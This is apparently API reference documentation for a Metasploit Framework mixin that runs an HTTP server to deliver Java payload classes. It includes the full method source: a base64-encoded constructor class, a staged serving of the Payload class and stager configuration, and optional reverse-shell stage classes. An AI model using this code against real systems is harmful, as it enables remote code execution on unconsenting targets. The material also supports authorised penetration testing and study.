Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader

Includes:
HttpServer
Defined in:
lib/msf/core/exploit/remote/java/http/class_loader.rb

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary collapse

Methods included from HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #on_request_uri, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string

Instance Method Details

#class_nameObject



128
129
130
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128

def class_name
  @class_name ||= rand_text_alpha(8..42).capitalize
end

#constructor_classObject

import metasploit.Payload;

public class Metasploit {
  public Metasploit() {
    try {
      Payload.main(null);
    }
    catch (Exception e) {}
  }
}


112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 112

def constructor_class
  klass = Rex::Text.decode_base64(
    <<~EOF
      yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
      U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
      AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
      AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
      AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
      BwALAAAA
    EOF
  )

  # Replace length-prefixed string "Metasploit" with a random one
  klass.sub("\x00\x0aMetasploit", packed_class_name)
end

#initialize(info = {}) ⇒ Object



12
13
14
15
16
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12

def initialize(info = {})
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Aggressive
  ))
end

#java_class_loader_on_request_uri(cli, request) ⇒ Object



41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 41

def java_class_loader_on_request_uri(cli, request)
  vprint_status("#{request.method} #{request.uri} requested")

  unless %w[HEAD GET].include?(request.method)
    vprint_error("Ignoring #{request.method} request")
    return
  end

  resource = request.raw_uri.delete_prefix(java_class_loader_resource_uri)

  if request.method == 'HEAD'
    whitelist = %W[
      #{class_name}.class
      metasploit/Payload.class
      metasploit.dat
    ]

    unless whitelist.include?(resource)
      vprint_error('Sending 404')
      return send_not_found(cli)
    end

    vprint_good('Sending 200')
    return send_response(cli, '')
  end

  case resource
  # Stage 1
  when "#{class_name}.class"
    vprint_good('Sending the constructor class')
    # This contains the constructor that will call our JavaPayload
    res = constructor_class
  # Stage 2
  when 'metasploit/Payload.class'
    vprint_good('Sending the main payload class')
    # This is our JavaPayload as a compiled class
    res = MetasploitPayloads.read('java/metasploit/Payload.class')
  # Stage 3
  when 'metasploit.dat'
    vprint_good('Sending the payload configuration data')
    # This tells the target how to address the payload; this is the magic!
    res = payload_instance.stager_config
  # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
  when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
    vprint_good("Sending additional payload class: #{resource}")
    res = MetasploitPayloads.read("java/#{resource}")
  else
    vprint_error('Sending 404')
    return send_not_found(cli)
  end

  send_response(
    cli,
    res,
    # file -I says application/x-java-applet, but I don't believe it
    'Content-Type' => 'application/octet-stream'
  )
end

#java_class_loader_resource_uriObject



33
34
35
36
37
38
39
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 33

def java_class_loader_resource_uri
  return @java_class_loader_resource_uri if @java_class_loader_resource_uri
  # the resource URI must end in / for the class loading to work
  path = resource_uri
  path += '/' unless path.end_with?('/')
  @java_class_loader_resource_uri = path
end

#java_class_loader_start_service(opts = {}) ⇒ Object



18
19
20
21
22
23
24
25
26
27
28
29
30
31
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18

def java_class_loader_start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts
  ssl = datastore['SSL']
  datastore['SSL'] = false

  opts['Uri'] = {
    'Proc' => Proc.new { |cli, req| java_class_loader_on_request_uri(cli, req) },
    'Path' => opts['Path'] || java_class_loader_resource_uri
  }.update(opts['Uri'] || {})
  start_service(opts)

  datastore['SSL'] = ssl
  get_uri
end

#packed_class_nameObject



132
133
134
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 132

def packed_class_name
  "#{[class_name.length].pack('n')}#{class_name}"
end